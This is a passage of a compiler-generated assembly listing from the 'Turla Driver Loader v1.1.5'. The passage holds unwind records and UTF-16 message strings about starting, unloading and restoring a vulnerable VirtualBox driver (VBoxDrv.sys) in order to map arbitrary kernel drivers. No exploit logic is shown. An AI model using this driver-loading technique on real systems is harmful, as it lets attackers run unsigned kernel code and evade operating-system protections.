DD imagerel $LN35+1671
DD imagerel $unwind$TDLMapDriver
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLStartVulnerableDriver DD imagerel $LN28
DD imagerel $LN28+590
DD imagerel $unwind$TDLStartVulnerableDriver
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLStopVulnerableDriver DD imagerel $LN16
DD imagerel $LN16+353
DD imagerel $unwind$TDLStopVulnerableDriver
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLProcessCommandLine DD imagerel $LN11
DD imagerel $LN11+177
DD imagerel $unwind$TDLProcessCommandLine
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLMain DD imagerel $LN14
DD imagerel $LN14+361
DD imagerel $unwind$TDLMain
pdata ENDS
; COMDAT ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@
CONST SEGMENT
??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H
DB 't', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' '
DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H
DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 's', 00H, 'o'
DB 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H, 'e', 00H
DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'l'
DB 00H, 'l', 00H, 'a', 00H, 't', 00H, 'i', 00H, 'o', 00H, 'n', 00H
DB ',', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e'
DB 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H
DB 'u', 00H, 'p', 00H, ' ', 00H, 'w', 00H, 'i', 00H, 'l', 00H, 'l'
DB 00H, ' ', 00H, 'b', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H
DB 'n', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@
CONST SEGMENT
??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ DB ' ', 00H, 'b'
DB 00H, 'u', 00H, 'i', 00H, 'l', 00H, 'd', 00H, ' ', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_13JOFGPIOO@?$AA?4@
CONST SEGMENT
??_C@_13JOFGPIOO@?$AA?4@ DB '.', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@
CONST SEGMENT
??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H
DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, 'v'
DB 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@
CONST SEGMENT
??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ DB 'U'
DB 00H, 'n', 00H, 's', 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H
DB 'r', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'W', 00H, 'i'
DB 00H, 'n', 00H, 'N', 00H, 'T', 00H, ' ', 00H, 'v', 00H, 'e', 00H
DB 'r', 00H, 's', 00H, 'i', 00H, 'o', 00H, 'n', 00H, 0dH, 00H, 0aH
DB 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@
CONST SEGMENT
??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ DB 'A'
DB 00H, 'n', 00H, 'o', 00H, 't', 00H, 'h', 00H, 'e', 00H, 'r', 00H
DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'n'
DB 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'u', 00H, 'n', 00H
DB 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ',', 00H, ' ', 00H, 'c'
DB 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, 'i', 00H
DB 't', 00H, ' ', 00H, 'b', 00H, 'e', 00H, 'f', 00H, 'o', 00H, 'r'
DB 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
CONST SEGMENT
??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T'
DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H
DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L'
DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H
DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' '
DB 00H, 's', 00H, 't', 00H, 'a', 00H, 'r', 00H, 't', 00H, 'e', 00H
DB 'd', 00H, 0dH, 00H, 0aH, 00H, '(', 00H, 'c', 00H, ')', 00H, ' '
DB 00H, '2', 00H, '0', 00H, '1', 00H, '6', 00H, ' ', 00H, '-', 00H
DB ' ', 00H, '2', 00H, '0', 00H, '1', 00H, '9', 00H, ' ', 00H, 'T'
DB 00H, 'D', 00H, 'L', 00H, ' ', 00H, 'P', 00H, 'r', 00H, 'o', 00H
DB 'j', 00H, 'e', 00H, 'c', 00H, 't', 00H, 0dH, 00H, 0aH, 00H, 'S'
DB 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H, 'r', 00H, 't', 00H
DB 'e', 00H, 'd', 00H, ' ', 00H, 'x', 00H, '6', 00H, '4', 00H, ' '
DB 00H, 'O', 00H, 'S', 00H, ' ', 00H, ':', 00H, ' ', 00H, '7', 00H
DB ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'b'
DB 00H, 'o', 00H, 'v', 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
CONST SEGMENT
??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T'
DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H
DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L'
DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H
DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' '
DB 00H, '(', 00H, '1', 00H, '9', 00H, '/', 00H, '0', 00H, '4', 00H
DB '/', 00H, '1', 00H, '9', 00H, ')', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@
CONST SEGMENT
??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H
DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'f', 00H, 'i', 00H, 'l'
DB 00H, 'e', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H
DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@
CONST SEGMENT
??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ DB 'U'
DB 00H, 's', 00H, 'a', 00H, 'g', 00H, 'e', 00H, ':', 00H, ' ', 00H
DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' '
DB 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H
DB 'T', 00H, 'o', 00H, 'L', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 0aH
DB 00H, 0dH, 00H, 'e', 00H, '.', 00H, 'g', 00H, '.', 00H, ' ', 00H
DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' '
DB 00H, 'm', 00H, 'y', 00H, 'd', 00H, 'r', 00H, 'v', 00H, '.', 00H
DB 's', 00H, 'y', 00H, 's', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
CONST SEGMENT
??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H
DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e'
DB 00H, ' ', 00H, 'r', 00H, 'e', 00H, 's', 00H, 't', 00H, 'o', 00H
DB 'r', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'o', 00H, 'r'
DB 00H, 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H
DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r'
DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H
DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H
DB 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@
CONST SEGMENT
??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'r', 00H
DB 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H, ' '
DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H
DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r'
DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'r', 00H
DB 'e', 00H, 's', 00H, 't', 00H, 'o', 00H, 'r', 00H, 'e', 00H, 'd'
DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H
DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H
DB 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
CONST SEGMENT
??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm'
DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' '
DB 00H, 'f', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@
CONST SEGMENT
??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i'
DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm', 00H
DB 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@
CONST SEGMENT
??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ DB '\'
DB 00H, '?', 00H, '?', 00H, '\', 00H, 'g', 00H, 'l', 00H, 'o', 00H
DB 'b', 00H, 'a', 00H, 'l', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't'
DB 00H, '\', 00H, 's', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H
DB 'm', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't', 00H, '\', 00H, 's'
DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, '3', 00H
DB '2', 00H, '\', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e'
DB 00H, 'r', 00H, 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H
DB 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y'
DB 00H, 's', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
CONST SEGMENT
??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm'
DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' '
DB 00H, 'e', 00H, 'n', 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H
DB 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e'
DB 00H, 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H
DB 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@
CONST SEGMENT
??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'e', 00H, 'n'
DB 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'r', 00H, 'e', 00H
DB 'm', 00H, 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'f'
DB 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e', 00H
DB 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H, 00H
DB 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
CONST SEGMENT
??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H
DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e'
DB 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H
DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'd', 00H, 'r'
DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
CONST SEGMENT
??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H
DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l'
DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
DB 'e', 00H, 'r', 00H, ' ', 00H, 's', 00H, 'u', 00H, 'c', 00H, 'c'
DB 00H, 'e', 00H, 's', 00H, 's', 00H, 'f', 00H, 'u', 00H, 'l', 00H
DB 'l', 00H, 'y', 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o'
DB 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@
CONST SEGMENT
??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'C', 00H, 'a', 00H
DB 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'o', 00H, 'p'
DB 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H
DB 'a', 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, ',', 00H, ' '
DB 00H, 'u', 00H, 'n', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H
DB ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
DB 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H
DB 'r', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@
CONST SEGMENT
??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g'
DB 00H, ' ', 00H, 'v', 00H, 'u', 00H, 'l', 00H, 'n', 00H, 'e', 00H
DB 'r', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd'
DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
CONST SEGMENT
??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H
DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l'
DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
DB 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'u', 00H
DB 'r', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@
CONST SEGMENT
??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'd', 00H, 'e'
DB 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'o', 00H
DB 'p', 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i'
DB 00H, 'l', 00H, 'u', 00H, 'r', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
CONST SEGMENT
??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S'
DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H
DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l'
DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H
DB ' ', 00H, 'o', 00H, 'p', 00H, 'e', 00H, 'n', 00H, 'e', 00H, 'd'
DB 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@
CONST SEGMENT
??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'r', 00H, 'i'
DB 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H
DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B'
DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'o', 00H, 'n', 00H, ' ', 00H
DB 'd', 00H, 'i', 00H, 's', 00H, 'k', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@
CONST SEGMENT
??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ DB '\'
DB 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H
DB 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D'
DB 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y', 00H, 's', 00H
DB 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@
CONST SEGMENT
??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'i', 00H
